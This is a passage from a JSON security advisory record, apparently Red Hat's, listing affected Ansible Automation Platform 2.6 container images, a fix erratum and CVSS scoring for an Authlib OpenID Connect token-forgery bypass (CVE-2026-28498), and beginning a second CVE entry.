"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28498"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b",
"url": "https://github.com/authlib/authlib/commit/b9bb2b25bf8b7e01512d847a95c1749646eaa72b"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
"url": "https://github.com/authlib/authlib/releases/tag/v1.6.9"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-m344-f55w-2m6j"
}
],
"release_date": "2026-03-16T18:03:28.821000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Authentication bypass via forged OpenID Connect ID Tokens"
},
{
"cve": "CVE-2026-28802",
"cwe": {
"id": "CWE-347",
"name": "Improper Verification of Cryptographic Signature"
},
"discovery_date": "2026-03-06T07:01:49.366979+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
